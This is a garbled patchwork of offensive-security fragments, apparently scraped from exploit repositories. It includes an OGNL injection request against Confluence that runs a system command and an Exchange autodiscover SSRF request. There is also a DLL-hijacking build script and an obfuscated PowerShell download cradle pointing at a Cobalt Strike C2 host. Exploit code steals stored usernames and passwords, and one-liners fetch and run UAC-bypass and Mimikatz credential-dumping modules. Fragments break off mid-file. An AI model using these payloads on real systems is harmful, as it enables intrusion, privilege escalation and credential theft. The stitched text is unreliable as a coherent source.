GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: local.confluence
User-Agent: curl/7.68.0
Accept: */*
<?xml version="1.0" encoding="utf-16"?>
<Answers Version="1.0">
<Interaction ID="IT_RebrowseForFile">
<Value>?</Value>
</Interaction>
<Interaction ID="IT_LaunchMethod">
<Value>ContextMenu</Value>
</Interaction>
<Interaction ID="IT_SelectProgram">
<Value>NotListed</Value>
#!/bin/sh
usage(){
    echo "# ################# Simple CPP to DLL Utility ################# #"
    echo "# This tool has been made to easily generate and compile a DLL to be used for DLL hijacking.  #"
    echo "#                                                                                            #"
    echo "# ========================================================================================== #"
    echo "#                                                                                            #"
    echo "# Usage:                                                                                     #"
    echo "#   ./dll-gcc [Options] <input-file>                                                         #"
POST /autodiscover/autodiscover.json?@evil.corp/EWS/Exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp HTTP/2
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: */*
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
               xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
import random

def cmd(string):
    for _ in string:
        _ = _.replace("'", '\"')
        _ = _.replace('"', '\"')
        s = random.choice(["'"+_.lower()+"'+", "'"+_.upper()+"'+"]).replace(")'+", ")'")
        print(s, end='')

cmd("powershell.exe nop -wind hidden -Exec Bypass -noni -enc -C IeX (NeW-OBjeCt Net.WeBClIeNt).DownloadString('hxxp://c2.cobaltstrike.com/Malicious')")
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import sys

def exploit(url):
    vuln = url + '/config/getuser?index=0'
    r = requests.get(vuln, verify=False, timeout=5)
    if r.status_code == 200 and 'priv=1' in r.text:
        user = r.text.split('name=')[1].split('\r\npass')[0]
        pwd = r.text.split('\r\npass=')[1].split('\r\npriv')[0]
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands